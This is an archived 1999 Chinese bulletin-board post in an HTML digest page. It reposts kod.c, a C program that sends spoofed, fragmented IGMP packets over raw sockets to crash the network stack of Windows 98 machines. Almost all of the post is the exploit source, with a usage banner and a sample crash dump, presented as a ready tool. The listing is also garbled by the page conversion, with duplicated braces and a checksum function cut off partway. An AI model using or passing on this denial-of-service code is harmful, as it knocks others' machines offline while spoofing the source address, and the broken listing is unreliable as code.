📄 361.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="310.htm">上一层</a>][<a href="362.htm">下一篇</a>]
<hr><p align="left"><small>发信人: lgwu (乱世糊涂虫), 信区: Security <br>
标 题: sending IGMP packet to crash windows9x(se)/2k <br>
发信站: 武汉白云黄鹤站 (Fri Sep 17 19:14:51 1999), 站内信件 <br>
<br>
/* <br>
<br>
::: kod.c (kiss of death) version 1.2 <br>
<br>
::: [author] kod.c bug found by klepto / <br>
<br>
klepto@levitate.net / rewritten by ignitor / ignitor@EFnet <br>
<br>
::: [stuph ] works on bsd/linux/*nix <br>
<br>
::: [notes ] bluescreens windows users(98/98se) and kills <br>
<br>
tcp stack <br>
<br>
::: [m$ bug] windows handles igmp badly and this is the <br>
<br>
result <br>
<br>
::: [greets] <br>
::: [greets] <br>
amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr <br>
<br>
ip/TFreak/napster <br>
<br>
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/ <br>
<br>
#irc_addict/#kgb/#eof/everyone <br>
<br>
::: [action] ./kod <host> and BEWM! <br>
<br>
::: [rant ] there will be lots of rewrites to this.. just <br>
<br>
get our name right! <br>
<br>
de omnibus dubitandum <br>
<br>
*/ <br>
/* <br>
<br>
windows core dump output (*whee*) <br>
<br>
An exception 0E has occurred at 0028:C14C9212 in VxD VIP <br>
<br>
(01) + <br>
<br>
00006C72. This was called from 0028:C183FF54 in VcD PPPMAC <br>
<br>
(04) + <br>
<br>
000079BR. It may be possible to continue normally(*not*). <br>
<br>
*/ <br>
<br>
<br>
<br>
<br>
<br>
#include <stdio.h> <br>
#include <string.h> <br>
<br>
#include <stdlib.h> <br>
<br>
#include <netinet/in.h> <br>
<br>
<br>
#include <netdb.h> <br>
<br>
#include <sys/time.h> <br>
<br>
#include <sys/types.h> <br>
<br>
#include <sys/socket.h> <br>
<br>
#include <arpa/inet.h> <br>
<br>
#include <unistd.h> <br>
<br>
struct iphdr <br>
<br>
{ <br>
<br>
unsigned char ihl:4, version:4, tos; <br>
<br>
unsigned short tot_len, id, frag_off; <br>
<br>
unsigned char ttl, protocol; <br>
<br>
<br>
unsigned short check; <br>
<br>
unsigned int saddr, daddr; <br>
<br>
}; <br>
<br>
<br>
<br>
struct igmphdr <br>
<br>
{ <br>
{ <br>
<br>
unsigned char type, code; <br>
<br>
unsigned short cksum; <br>
<br>
struct in_addr group; <br>
<br>
}; <br>
<br>
<br>
<br>
<br>
unsigned short in_chksum(unsigned short *, int); <br>
<br>
long resolve(char *); <br>
<br>
<br>
<br>
long resolve(char *host) <br>
<br>
{ <br>
struct hostent *hst; <br>
<br>
long addr; <br>
<br>
<br>
<br>
hst = gethostbyname(host); <br>
<br>
if (hst == NULL) <br>
<br>
return(-1); <br>
<br>
<br>
<br>
<br>
memcpy(&addr, hst->h_addr, hst->h_length); <br>
<br>
<br>
<br>
return(addr); <br>
<br>
} <br>
} <br>
<br>
<br>
<br>
int main(int argc, char *argv[]) <br>
<br>
{ <br>
<br>
struct sockaddr_in dst; <br>
<br>
struct iphdr *ip; <br>
<br>
struct igmphdr *igmp; <br>
<br>
long daddr, saddr; <br>
<br>
int s, i=0, c, len; <br>
<br>
char buf[1500]; <br>
<br>
<br>
if (argc < 3) <br>
<br>
{ <br>
<br>
printf("KOD spoofer by Ignitor and klepto\n"); <br>
<br>
printf("Usage: %s <src> <dst>\n", *argv); <br>
<br>
return(1); <br>
<br>
} <br>
<br>
<br>
<br>
<br>
daddr = resolve(argv[2]); <br>
<br>
saddr = resolve(argv[1]); <br>
<br>
<br>
<br>
memset(buf, 0, 1500); <br>
ip = (struct iphdr *)&buf; <br>
<br>
igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)]; <br>
<br>
<br>
<br>
dst.sin_addr.s_addr = daddr; <br>
<br>
dst.sin_family = AF_INET; <br>
<br>
<br>
<br>
ip->ihl = 5; <br>
<br>
ip->version = 4; <br>
<br>
ip->tos = 0; <br>
<br>
ip->tot_len = htons(10933); <br>
ip->id = htons(48648); <br>
<br>
ip->ttl = 64; <br>
<br>
ip->protocol = IPPROTO_IGMP; <br>
<br>
ip->check = in_chksum((unsigned short *)ip, sizeof(struct <br>
<br>
iphdr)); <br>
<br>
ip->saddr = saddr; <br>
<br>
ip->daddr = daddr; <br>
<br>
<br>
<br>
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); <br>
<br>
<br>
if (s == -1) <br>
<br>
return(1); <br>
printf("Sending IGMP packets: %s -> %s\n", argv[1], argv <br>
<br>
[2]); <br>
<br>
<br>
<br>
for (c=0;c<2;c++) <br>
<br>
{ <br>
<br>
len = 220; <br>
<br>
ip->frag_off = htons(0x73a); <br>
<br>
<br>
<br>
for (i=0;;i++) <br>
<br>
{ <br>
{ <br>
<br>
if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof <br>
<br>
(struct sockaddr_in)) == -1) <br>
<br>
{ <br>
<br>
perror("Error sending packet"); <br>
<br>
exit(-1); <br>
<br>
} <br>
<br>
if (ntohs(ip->frag_off) == 0x2000) <br>
<br>
break; <br>
<br>
len = 1500; <br>
<br>
if (!i) <br>
ip->frag_off = htons(0x2681); <br>
<br>
<br>
else <br>
<br>
ip->frag_off = htons(ntohs(ip->frag_off) - 185); <br>
<br>
<br>
<br>
ip->check = in_chksum((unsigned short *)ip, sizeof <br>
<br>
(struct iphdr)); <br>
<br>
} <br>
<br>
} <br>
<br>
<br>
<br>
return(1); <br>
<br>
} <br>
<br>
<br>
<br>
<br>
unsigned short in_chksum(unsigned short *addr, int len) <br>
<br>
{ <br>
<br>
register int nleft = len; <br>
<br>
register int sum = 0; <br>
<br>
u_short answer = 0; <br>
<br>
<br>
<br>
while (nleft > 1) { <br>
<br>
sum += *addr++; <br>
<br>
nleft -= 2; <br>
} <br>
<br>
<br>
tested on win98/win98SE. crashed it's tcp/ip connect <br>
<br>
<br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="310.htm">上一层</a>][<a href="362.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -